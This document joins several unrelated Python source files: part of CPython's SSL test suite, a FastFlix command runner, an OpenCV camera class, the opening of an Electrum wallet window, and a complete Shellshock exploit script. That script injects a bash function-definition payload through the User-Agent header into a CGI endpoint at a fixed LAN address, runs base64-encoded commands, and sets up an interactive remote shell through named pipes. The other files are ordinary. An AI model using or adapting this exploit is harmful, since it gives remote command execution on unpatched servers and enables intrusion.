self.assertRaises((ssl.SSLWantWriteError,
ssl.SSLWantReadError), fill_buffer)
# Now read all the output and discard it
s.setblocking(True)
s.close()
def test_handshake_timeout(self):
# Issue #5103: SSL handshake must respect the socket timeout
server = socket.socket(socket.AF_INET)
host = "127.0.0.1"
port = support.bind_port(server)
started = threading.Event()
finish = False
def serve():
server.listen()
started.set()
conns = []
while not finish:
r, w, e = select.select([server], [], [], 0.1)
if server in r:
# Let the socket hang around rather than having
# it closed by garbage collection.
conns.append(server.accept()[0])
for sock in conns:
sock.close()
t = threading.Thread(target=serve)
t.start()
started.wait()
try:
try:
c = socket.socket(socket.AF_INET)
c.settimeout(0.2)
c.connect((host, port))
# Will attempt handshake and time out
self.assertRaisesRegex(socket.timeout, "timed out",
test_wrap_socket, c)
finally:
c.close()
try:
c = socket.socket(socket.AF_INET)
c = test_wrap_socket(c)
c.settimeout(0.2)
# Will attempt handshake and time out
self.assertRaisesRegex(socket.timeout, "timed out",
c.connect, (host, port))
finally:
c.close()
finally:
finish = True
t.join()
server.close()
def test_server_accept(self):
# Issue #16357: accept() on a SSLSocket created through
# SSLContext.wrap_socket().
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(CERTFILE)
context.load_cert_chain(CERTFILE)
server = socket.socket(socket.AF_INET)
host = "127.0.0.1"
port = support.bind_port(server)
server = context.wrap_socket(server, server_side=True)
self.assertTrue(server.server_side)
evt = threading.Event()
remote = None
peer = None
def serve():
nonlocal remote, peer
server.listen()
# Block on the accept and wait on the connection to close.
evt.set()
remote, peer = server.accept()
remote.recv(1)
t = threading.Thread(target=serve)
t.start()
# Client wait until server setup and perform a connect.
evt.wait()
client = context.wrap_socket(socket.socket())
client.connect((host, port))
client_addr = client.getsockname()
client.close()
t.join()
remote.close()
server.close()
# Sanity checks.
self.assertIsInstance(remote, ssl.SSLSocket)
self.assertEqual(peer, client_addr)
def test_getpeercert_enotconn(self):
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
with context.wrap_socket(socket.socket()) as sock:
with self.assertRaises(OSError) as cm:
sock.getpeercert()
self.assertEqual(cm.exception.errno, errno.ENOTCONN)
def test_do_handshake_enotconn(self):
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
with context.wrap_socket(socket.socket()) as sock:
with self.assertRaises(OSError) as cm:
sock.do_handshake()
self.assertEqual(cm.exception.errno, errno.ENOTCONN)
def test_default_ciphers(self):
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
try:
# Force a set of weak ciphers on our client context
context.set_ciphers("DES")
except ssl.SSLError:
self.skipTest("no DES cipher available")
with ThreadedEchoServer(CERTFILE,
ssl_version=ssl.PROTOCOL_SSLv23,
chatty=False) as server:
with context.wrap_socket(socket.socket()) as s:
with self.assertRaises(OSError):
s.connect((HOST, server.port))
self.assertIn("no shared cipher", str(server.conn_errors[0]))
def test_version_basic(self):
"""
Basic tests for SSLSocket.version().
More tests are done in the test_protocol_*() methods.
"""
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with ThreadedEchoServer(CERTFILE,
ssl_version=ssl.PROTOCOL_TLSv1,
chatty=False) as server:
with context.wrap_socket(socket.socket()) as s:
self.assertIs(s.version(), None)
s.connect((HOST, server.port))
self.assertEqual(s.version(), 'TLSv1')
self.assertIs(s.version(), None)
@unittest.skipUnless(ssl.HAS_ECDH, "test requires ECDH-enabled OpenSSL")
def test_default_ecdh_curve(self):
# Issue #21015: elliptic curve-based Diffie Hellman key exchange
# should be enabled by default on SSL contexts.
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.load_cert_chain(CERTFILE)
# Prior to OpenSSL 1.0.0, ECDH ciphers have to be enabled
# explicitly using the 'ECCdraft' cipher alias. Otherwise,
# our default cipher list should prefer ECDH-based ciphers
# automatically.
if ssl.OPENSSL_VERSION_INFO < (1, 0, 0):
context.set_ciphers("ECCdraft:ECDH")
with ThreadedEchoServer(context=context) as server:
with context.wrap_socket(socket.socket()) as s:
s.connect((HOST, server.port))
self.assertIn("ECDH", s.cipher()[0])
@unittest.skipUnless("tls-unique" in ssl.CHANNEL_BINDING_TYPES,
"'tls-unique' channel binding not available")
def test_tls_unique_channel_binding(self):
"""Test tls-unique channel binding."""
if support.verbose:
sys.stdout.write("\n")
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1,
cacerts=CERTFILE,
chatty=True,
connectionchatty=False)
with server:
s = test_wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1)
s.connect((HOST, server.port))
# get the data
cb_data = s.get_channel_binding("tls-unique")
if support.verbose:
sys.stdout.write(" got channel binding data: {0!r}\n"
.format(cb_data))
# check if it is sane
self.assertIsNotNone(cb_data)
self.assertEqual(len(cb_data), 12) # True for TLSv1
# and compare with the peers version
s.write(b"CB tls-unique\n")
peer_data_repr = s.read().strip()
self.assertEqual(peer_data_repr,
repr(cb_data).encode("us-ascii"))
s.close()
# now, again
s = test_wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1)
s.connect((HOST, server.port))
new_cb_data = s.get_channel_binding("tls-unique")
if support.verbose:
sys.stdout.write(" got another channel binding data: {0!r}\n"
.format(new_cb_data))
# is it really unique
self.assertNotEqual(cb_data, new_cb_data)
self.assertIsNotNone(cb_data)
self.assertEqual(len(cb_data), 12) # True for TLSv1
s.write(b"CB tls-unique\n")
peer_data_repr = s.read().strip()
self.assertEqual(peer_data_repr,
repr(new_cb_data).encode("us-ascii"))
s.close()
def test_compression(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
stats = server_params_test(context, context,
chatty=True, connectionchatty=True)
if support.verbose:
sys.stdout.write(" got compression: {!r}\n".format(stats['compression']))
self.assertIn(stats['compression'], { None, 'ZLIB', 'RLE' })
@unittest.skipUnless(hasattr(ssl, 'OP_NO_COMPRESSION'),
"ssl.OP_NO_COMPRESSION needed for this test")
def test_compression_disabled(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
context.options |= ssl.OP_NO_COMPRESSION
stats = server_params_test(context, context,
chatty=True, connectionchatty=True)
self.assertIs(stats['compression'], None)
def test_dh_params(self):
# Check we can get a connection with ephemeral Diffie-Hellman
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
context.load_dh_params(DHFILE)
context.set_ciphers("kEDH")
stats = server_params_test(context, context,
chatty=True, connectionchatty=True)
cipher = stats["cipher"][0]
parts = cipher.split("-")
if "ADH" not in parts and "EDH" not in parts and "DHE" not in parts:
self.fail("Non-DH cipher: " + cipher[0])
def test_selected_alpn_protocol(self):
# selected_alpn_protocol() is None unless ALPN is used.
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
stats = server_params_test(context, context,
chatty=True, connectionchatty=True)
self.assertIs(stats['client_alpn_protocol'], None)
@unittest.skipUnless(ssl.HAS_ALPN, "ALPN support required")
def test_selected_alpn_protocol_if_server_uses_alpn(self):
# selected_alpn_protocol() is None unless ALPN is used by the client.
client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
client_context.load_verify_locations(CERTFILE)
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(CERTFILE)
server_context.set_alpn_protocols(['foo', 'bar'])
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True)
self.assertIs(stats['client_alpn_protocol'], None)
@unittest.skipUnless(ssl.HAS_ALPN, "ALPN support needed for this test")
def test_alpn_protocols(self):
server_protocols = ['foo', 'bar', 'milkshake']
protocol_tests = [
(['foo', 'bar'], 'foo'),
(['bar', 'foo'], 'foo'),
(['milkshake'], 'milkshake'),
(['http/3.0', 'http/4.0'], None)
]
for client_protocols, expected in protocol_tests:
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1_2)
server_context.load_cert_chain(CERTFILE)
server_context.set_alpn_protocols(server_protocols)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1_2)
client_context.load_cert_chain(CERTFILE)
client_context.set_alpn_protocols(client_protocols)
try:
stats = server_params_test(client_context,
server_context,
chatty=True,
connectionchatty=True)
except ssl.SSLError as e:
stats = e
if expected is None and IS_OPENSSL_1_1:
# OpenSSL 1.1.0 raises handshake error
self.assertIsInstance(stats, ssl.SSLError)
else:
msg = "failed trying %s (s) and %s (c).\n" \
"was expecting %s, but got %%s from the %%s" \
% (str(server_protocols), str(client_protocols),
str(expected))
client_result = stats['client_alpn_protocol']
self.assertEqual(client_result, expected,
msg % (client_result, "client"))
server_result = stats['server_alpn_protocols'][-1] \
if len(stats['server_alpn_protocols']) else 'nothing'
self.assertEqual(server_result, expected,
msg % (server_result, "server"))
def test_selected_npn_protocol(self):
# selected_npn_protocol() is None unless NPN is used
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
stats = server_params_test(context, context,
chatty=True, connectionchatty=True)
self.assertIs(stats['client_npn_protocol'], None)
@unittest.skipUnless(ssl.HAS_NPN, "NPN support needed for this test")
def test_npn_protocols(self):
server_protocols = ['http/1.1', 'spdy/2']
protocol_tests = [
(['http/1.1', 'spdy/2'], 'http/1.1'),
(['spdy/2', 'http/1.1'], 'http/1.1'),
(['spdy/2', 'test'], 'spdy/2'),
(['abc', 'def'], 'abc')
]
for client_protocols, expected in protocol_tests:
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(CERTFILE)
server_context.set_npn_protocols(server_protocols)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
client_context.load_cert_chain(CERTFILE)
client_context.set_npn_protocols(client_protocols)
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True)
msg = "failed trying %s (s) and %s (c).\n" \
"was expecting %s, but got %%s from the %%s" \
% (str(server_protocols), str(client_protocols),
str(expected))
client_result = stats['client_npn_protocol']
self.assertEqual(client_result, expected, msg % (client_result, "client"))
server_result = stats['server_npn_protocols'][-1] \
if len(stats['server_npn_protocols']) else 'nothing'
self.assertEqual(server_result, expected, msg % (server_result, "server"))
def sni_contexts(self):
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(SIGNED_CERTFILE)
other_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
other_context.load_cert_chain(SIGNED_CERTFILE2)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
client_context.verify_mode = ssl.CERT_REQUIRED
client_context.load_verify_locations(SIGNING_CA)
return server_context, other_context, client_context
def check_common_name(self, stats, name):
cert = stats['peercert']
self.assertIn((('commonName', name),), cert['subject'])
@needs_sni
def test_sni_callback(self):
calls = []
server_context, other_context, client_context = self.sni_contexts()
def servername_cb(ssl_sock, server_name, initial_context):
calls.append((server_name, initial_context))
if server_name is not None:
ssl_sock.context = other_context
server_context.set_servername_callback(servername_cb)
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name='supermessage')
# The hostname was fetched properly, and the certificate was
# changed for the connection.
self.assertEqual(calls, [("supermessage", server_context)])
# CERTFILE4 was selected
self.check_common_name(stats, 'fakehostname')
calls = []
# The callback is called with server_name=None
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name=None)
self.assertEqual(calls, [(None, server_context)])
self.check_common_name(stats, 'localhost')
# Check disabling the callback
calls = []
server_context.set_servername_callback(None)
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name='notfunny')
# Certificate didn't change
self.check_common_name(stats, 'localhost')
self.assertEqual(calls, [])
@needs_sni
def test_sni_callback_alert(self):
# Returning a TLS alert is reflected to the connecting client
server_context, other_context, client_context = self.sni_contexts()
def cb_returning_alert(ssl_sock, server_name, initial_context):
return ssl.ALERT_DESCRIPTION_ACCESS_DENIED
server_context.set_servername_callback(cb_returning_alert)
with self.assertRaises(ssl.SSLError) as cm:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'TLSV1_ALERT_ACCESS_DENIED')
@needs_sni
def test_sni_callback_raising(self):
# Raising fails the connection with a TLS handshake failure alert.
server_context, other_context, client_context = self.sni_contexts()
def cb_raising(ssl_sock, server_name, initial_context):
1/0
server_context.set_servername_callback(cb_raising)
with self.assertRaises(ssl.SSLError) as cm, \
support.captured_stderr() as stderr:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'SSLV3_ALERT_HANDSHAKE_FAILURE')
self.assertIn("ZeroDivisionError", stderr.getvalue())
@needs_sni
def test_sni_callback_wrong_return_type(self):
# Returning the wrong return type terminates the TLS connection
# with an internal error alert.
server_context, other_context, client_context = self.sni_contexts()
def cb_wrong_return_type(ssl_sock, server_name, initial_context):
return "foo"
server_context.set_servername_callback(cb_wrong_return_type)
with self.assertRaises(ssl.SSLError) as cm, \
support.captured_stderr() as stderr:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'TLSV1_ALERT_INTERNAL_ERROR')
self.assertIn("TypeError", stderr.getvalue())
def test_shared_ciphers(self):
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(SIGNED_CERTFILE)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
client_context.verify_mode = ssl.CERT_REQUIRED
client_context.load_verify_locations(SIGNING_CA)
if ssl.OPENSSL_VERSION_INFO >= (1, 0, 2):
client_context.set_ciphers("AES128:AES256")
server_context.set_ciphers("AES256")
alg1 = "AES256"
alg2 = "AES-256"
else:
client_context.set_ciphers("AES:3DES")
server_context.set_ciphers("3DES")
alg1 = "3DES"
alg2 = "DES-CBC3"
stats = server_params_test(client_context, server_context)
ciphers = stats['server_shared_ciphers'][0]
self.assertGreater(len(ciphers), 0)
for name, tls_version, bits in ciphers:
if not alg1 in name.split("-") and alg2 not in name:
self.fail(name)
def test_read_write_after_close_raises_valuerror(self):
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(CERTFILE)
context.load_cert_chain(CERTFILE)
server = ThreadedEchoServer(context=context, chatty=False)
with server:
s = context.wrap_socket(socket.socket())
s.connect((HOST, server.port))
s.close()
self.assertRaises(ValueError, s.read, 1024)
self.assertRaises(ValueError, s.write, b'hello')
def test_sendfile(self):
TEST_DATA = b"x" * 512
with open(support.TESTFN, 'wb') as f:
f.write(TEST_DATA)
self.addCleanup(support.unlink, support.TESTFN)
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(CERTFILE)
context.load_cert_chain(CERTFILE)
server = ThreadedEchoServer(context=context, chatty=False)
with server:
with context.wrap_socket(socket.socket()) as s:
s.connect((HOST, server.port))
with open(support.TESTFN, 'rb') as file:
s.sendfile(file)
self.assertEqual(s.recv(1024), TEST_DATA)
def test_session(self):
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(SIGNED_CERTFILE)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
client_context.verify_mode = ssl.CERT_REQUIRED
client_context.load_verify_locations(SIGNING_CA)
# first connection without session
stats = server_params_test(client_context, server_context)
session = stats['session']
self.assertTrue(session.id)
self.assertGreater(session.time, 0)
self.assertGreater(session.timeout, 0)
self.assertTrue(session.has_ticket)
if ssl.OPENSSL_VERSION_INFO > (1, 0, 1):
self.assertGreater(session.ticket_lifetime_hint, 0)
self.assertFalse(stats['session_reused'])
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 1)
self.assertEqual(sess_stat['hits'], 0)
# reuse session
stats = server_params_test(client_context, server_context, session=session)
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 2)
self.assertEqual(sess_stat['hits'], 1)
self.assertTrue(stats['session_reused'])
session2 = stats['session']
self.assertEqual(session2.id, session.id)
self.assertEqual(session2, session)
self.assertIsNot(session2, session)
self.assertGreaterEqual(session2.time, session.time)
self.assertGreaterEqual(session2.timeout, session.timeout)
# another one without session
stats = server_params_test(client_context, server_context)
self.assertFalse(stats['session_reused'])
session3 = stats['session']
self.assertNotEqual(session3.id, session.id)
self.assertNotEqual(session3, session)
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 3)
self.assertEqual(sess_stat['hits'], 1)
# reuse session again
stats = server_params_test(client_context, server_context, session=session)
self.assertTrue(stats['session_reused'])
session4 = stats['session']
self.assertEqual(session4.id, session.id)
self.assertEqual(session4, session)
self.assertGreaterEqual(session4.time, session.time)
self.assertGreaterEqual(session4.timeout, session.timeout)
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 4)
self.assertEqual(sess_stat['hits'], 2)
def test_session_handling(self):
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(CERTFILE)
context.load_cert_chain(CERTFILE)
context2 = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context2.verify_mode = ssl.CERT_REQUIRED
context2.load_verify_locations(CERTFILE)
context2.load_cert_chain(CERTFILE)
server = ThreadedEchoServer(context=context, chatty=False)
with server:
with context.wrap_socket(socket.socket()) as s:
# session is None before handshake
self.assertEqual(s.session, None)
self.assertEqual(s.session_reused, None)
s.connect((HOST, server.port))
session = s.session
self.assertTrue(session)
with self.assertRaises(TypeError) as e:
s.session = object
self.assertEqual(str(e.exception), 'Value is not a SSLSession.')
with context.wrap_socket(socket.socket()) as s:
s.connect((HOST, server.port))
# cannot set session after handshake
with self.assertRaises(ValueError) as e:
s.session = session
self.assertEqual(str(e.exception),
'Cannot set session after handshake.')
with context.wrap_socket(socket.socket()) as s:
# can set session before handshake and before the
# connection was established
s.session = session
s.connect((HOST, server.port))
self.assertEqual(s.session.id, session.id)
self.assertEqual(s.session, session)
self.assertEqual(s.session_reused, True)
with context2.wrap_socket(socket.socket()) as s:
# cannot re-use session with a different SSLContext
with self.assertRaises(ValueError) as e:
s.session = session
s.connect((HOST, server.port))
self.assertEqual(str(e.exception),
'Session refers to a different SSLContext.')
def test_main(verbose=False):
if support.verbose:
import warnings
plats = {
'Linux': platform.linux_distribution,
'Mac': platform.mac_ver,
'Windows': platform.win32_ver,
}
with warnings.catch_warnings():
warnings.filterwarnings(
'ignore',
r'dist\(\) and linux_distribution\(\) '
'functions are deprecated .*',
PendingDeprecationWarning,
)
for name, func in plats.items():
plat = func()
if plat and plat[0]:
plat = '%s %r' % (name, plat)
break
else:
plat = repr(platform.platform())
print("test_ssl: testing with %r %r" %
(ssl.OPENSSL_VERSION, ssl.OPENSSL_VERSION_INFO))
print(" under %s" % plat)
print(" HAS_SNI = %r" % ssl.HAS_SNI)
print(" OP_ALL = 0x%8x" % ssl.OP_ALL)
try:
print(" OP_NO_TLSv1_1 = 0x%8x" % ssl.OP_NO_TLSv1_1)
except AttributeError:
pass
for filename in [
CERTFILE, BYTES_CERTFILE,
ONLYCERT, ONLYKEY, BYTES_ONLYCERT, BYTES_ONLYKEY,
SIGNED_CERTFILE, SIGNED_CERTFILE2, SIGNING_CA,
BADCERT, BADKEY, EMPTYCERT]:
if not os.path.exists(filename):
raise support.TestFailed("Can't read certificate file %r" % filename)
tests = [
ContextTests, BasicSocketTests, SSLErrorTests, MemoryBIOTests,
SimpleBackgroundTests,
]
if support.is_resource_enabled('network'):
tests.append(NetworkedTests)
if _have_threads:
thread_info = support.threading_setup()
if thread_info:
tests.append(ThreadedTests)
try:
support.run_unittest(*tests)
finally:
if _have_threads:
support.threading_cleanup(*thread_info)
if __name__ == "__main__":
test_main()
|
command_runner.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import logging
import re
import secrets
import shlex
from pathlib import Path
from subprocess import PIPE
from threading import Thread
from psutil import Popen
logger = logging.getLogger("fastflix-core")
__all__ = ["BackgroundRunner"]
white_detect = re.compile(r"^\s+")
class BackgroundRunner:
def __init__(self, log_queue):
self.process = None
self.process_two = None
self.killed = False
self.output_file = None
self.error_output_file = None
self.log_queue = log_queue
self.error_detected = False
self.success_detected = False
self.error_message = []
self.success_message = []
def start_exec(self, command, work_dir: str = None, shell: bool = False, errors=(), successes=()):
self.clean()
logger.info(f"Running command: {command}")
Path(work_dir).mkdir(exist_ok=True, parents=True)
self.output_file = Path(work_dir) / f"encoder_output_{secrets.token_hex(6)}.log"
self.error_output_file = Path(work_dir) / f"encoder_error_output_{secrets.token_hex(6)}.log"
self.output_file.touch(exist_ok=True)
self.error_output_file.touch(exist_ok=True)
self.error_message = errors
self.success_message = successes
self.process = Popen(
shlex.split(command) if not shell and isinstance(command, str) else command,
shell=shell,
cwd=work_dir,
stdout=open(self.output_file, "w"),
stderr=open(self.error_output_file, "w"),
stdin=PIPE, # FFmpeg can try to read stdin and wrecks havoc on linux
encoding="utf-8",
)
Thread(target=self.read_output).start()
def start_piped_exec(self, command_one, command_two, work_dir, errors=(), successes=()):
self.clean()
logger.info(f"Running commands: {' '.join(command_one)} | {' '.join(command_two)}")
Path(work_dir).mkdir(exist_ok=True, parents=True)
self.output_file = Path(work_dir) / f"encoder_output_{secrets.token_hex(6)}.log"
self.error_output_file = Path(work_dir) / f"encoder_error_output_{secrets.token_hex(6)}.log"
self.output_file.touch(exist_ok=True)
self.error_output_file.touch(exist_ok=True)
self.error_message = errors
self.success_message = successes
self.process = Popen(
command_one,
cwd=work_dir,
stdout=PIPE,
stderr=PIPE,
stdin=PIPE, # FFmpeg can try to read stdin and wrecks havoc on linux
)
self.process_two = Popen(
command_two,
cwd=work_dir,
stdout=open(self.output_file, "w"),
stderr=open(self.error_output_file, "w"),
stdin=self.process.stdout,
encoding="utf-8",
)
self.error_detected = False
Thread(target=self.read_output).start()
def read_output(self):
with open(self.output_file, "r", encoding="utf-8", errors="ignore") as out_file, open(
self.error_output_file, "r", encoding="utf-8", errors="ignore"
) as err_file:
while True:
if not self.is_alive():
excess = out_file.read()
logger.info(excess)
self.log_queue.put(excess)
err_excess = err_file.read()
logger.info(err_excess)
self.log_queue.put(err_excess)
break
line = out_file.readline().rstrip()
if line:
logger.info(line)
self.log_queue.put(line)
if not self.success_detected:
for success in self.success_message:
if success in line:
self.success_detected = True
err_line = err_file.readline().rstrip()
if err_line:
logger.info(err_line)
self.log_queue.put(err_line)
if "Conversion failed!" in err_line:
self.error_detected = True
if not self.error_detected:
for error in self.error_message:
if error in err_line:
self.error_detected = True
try:
self.output_file.unlink()
self.error_output_file.unlink()
except OSError:
pass
def read(self, limit=None):
if not self.is_alive():
return
return self.process.stdout.read(limit)
def is_alive(self):
if not self.process:
return False
if self.process_two:
# TODO make sure process 1 dies cleanly
return True if self.process_two.poll() is None else False
return True if self.process.poll() is None else False
def clean(self):
self.kill(log=False)
self.process = None
self.process_two = None
self.error_detected = False
self.success_detected = False
self.killed = False
def kill(self, log=True):
if self.process_two:
if log:
logger.info(f"Killing worker process {self.process_two.pid}")
try:
self.process_two.terminate()
self.process_two.kill()
except Exception as err:
if log:
logger.exception(f"Couldn't terminate process: {err}")
if self.process:
if log:
logger.info(f"Killing worker process {self.process.pid}")
try:
# if reusables.win_based:
# os.kill(self.process.pid, signal.CTRL_C_EVENT)
# else:
# os.killpg(os.getpgid(self.process.pid), signal.SIGTERM)
self.process.terminate()
self.process.kill()
except Exception as err:
if log:
logger.exception(f"Couldn't terminate process: {err}")
self.killed = True
def pause(self):
if self.process_two:
return False
if not self.process:
return False
self.process.suspend()
def resume(self):
if self.process_two:
return False
if not self.process:
return False
self.process.resume()
# if __name__ == "__main__":
# from queue import Queue
#
# logging.basicConfig(level=logging.DEBUG)
# br = BackgroundRunner(Queue())
# import shutil
#
# ffmpeg = shutil.which("ffmpeg")
# br.start_piped_exec(
# command_one=shlex.split(
# rf'"{ffmpeg}" -loglevel panic -i C:\\Users\\Chris\\scoob_short.mkv -c:v copy -vbsf hevc_mp4toannexb -f hevc -'
# ),
# command_two=shlex.split(r'"C:\\Users\\Chris\\ffmpeg\\hdr10plus_parser.exe" --verify -'),
# work_dir=r"C:\Users\Chris",
# )
# import time
# time.sleep(1)
# br.read_output()
|
Camera.py
|
#!/usr/bin/env python3
# encoding:utf-8
import sys
import cv2
import time
import threading
import numpy as np
if sys.version_info.major == 2:
print('Please run this program with python3!')
sys.exit(0)
class Camera:
def __init__(self, resolution=(640, 480)):
self.cap = None
self.width = resolution[0]
self.height = resolution[1]
self.frame = None
self.opened = False
self.th = threading.Thread(target=self.camera_task, args=(), daemon=True)
self.th.start()
def camera_open(self):
try:
self.cap = cv2.VideoCapture(-1)
self.cap.set(cv2.CAP_PROP_FOURCC, cv2.VideoWriter_fourcc('Y', 'U', 'Y', 'V'))
self.cap.set(cv2.CAP_PROP_FPS, 30)
self.cap.set(cv2.CAP_PROP_SATURATION, 40)
self.opened = True
except Exception as e:
print('打开摄像头失败:', e)
def camera_close(self):
try:
self.opened = False
time.sleep(0.2)
if self.cap is not None:
self.cap.release()
time.sleep(0.05)
self.cap = None
except Exception as e:
print('关闭摄像头失败:', e)
def camera_task(self):
while True:
try:
if self.opened and self.cap.isOpened():
ret, frame_tmp = self.cap.read()
if ret:
self.frame = cv2.resize(frame_tmp, (self.width, self.height), interpolation=cv2.INTER_NEAREST)
ret = False
else:
self.frame = None
self.cap.release()
cap = cv2.VideoCapture(-1)
ret, _ = cap.read()
if ret:
self.cap = cap
elif self.opened:
self.cap.release()
cap = cv2.VideoCapture(-1)
ret, _ = cap.read()
if ret:
self.cap = cap
else:
time.sleep(0.01)
except Exception as e:
print('获取摄像头画面出错:', e)
time.sleep(0.01)
if __name__ == '__main__':
my_camera = Camera()
my_camera.camera_open()
print('摄像头原始画面,未做畸变校正')
while True:
img = my_camera.frame
if img is not None:
cv2.imshow('img', img)
key = cv2.waitKey(1)
if key == 27:
break
my_camera.camera_close()
cv2.destroyAllWindows()
|
shellshock-exp.py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# from IPython.core.debugger import Tracer; breakpoint = Tracer()
import requests
import time
from base64 import b64encode
from random import randrange
import threading
class AllTheReads(object):
def __init__(self, interval=1):
self.interval = interval
thread = threading.Thread(target=self.run, args=())
thread.daemon = True
thread.start()
def run(self):
readoutput = """/bin/cat %s""" % (stdout)
clearoutput = """echo '' > %s""" % (stdout)
while True:
output = RunCmd(readoutput)
if output:
RunCmd(clearoutput)
print(output)
time.sleep(self.interval)
def RunCmd(cmd):
cmd = cmd.encode('utf-8')
cmd = b64encode(cmd).decode('utf-8')
headers = \
{'User-Agent': '() { :; }; echo "Content-Type: text/html"; echo; export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; echo "%s" | base64 -d | sh' \
% cmd}
result = (requests.get('http://192.168.1.31:591/cgi-bin/cat',
headers=headers, timeout=2).text).strip()
return result
def WriteCmd(cmd):
cmd = cmd.encode('utf-8')
cmd = b64encode(cmd).decode('utf-8')
headers = \
{'User-Agent': '() { :; }; echo "Content-Type: text/html"; echo; export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; echo "%s" | base64 -d > %s' \
% (cmd, stdin)}
result = (requests.get('http://192.168.1.31:591/cgi-bin/cat',
headers=headers, timeout=2).text).strip()
return result
def ReadCmd():
GetOutput = """/bin/cat %s""" % (stdout)
output = RunCmd(GetOutput)
return output
def SetupShell():
NamedPipes = """mkfifo %s;tail -f %s | /bin/sh 2>&1 >%s""" \
% (stdin, stdin, stdout)
try:
RunCmd(NamedPipes)
except:
None
return None
global stdin, stdout
session = randrange(1000, 9999)
stdin = "/dev/shm/input.%s" % (session)
stdout = "/dev/shm/output.%s" % (session)
SetupShell()
# Infinite loop to read STDOUT File
ReadingTheThings = AllTheReads()
while True:
cmd = input("> ")
WriteCmd(cmd + "\n")
time.sleep(1.1)
|
main_window.py
|
#!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2012 thomasv@gitorious
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import sys
import time
import threading
import os
import traceback
import json
import shutil
import weakref
import csv
from decimal import Decimal
import base64
from functools import partial
import queue
import asyncio
from typing import Optional, TYPE_CHECKING, Sequence, List, Union
from PyQt5.QtGui import QPixmap, QKeySequence, QIcon, QCursor, QFont, QRegExpValidator
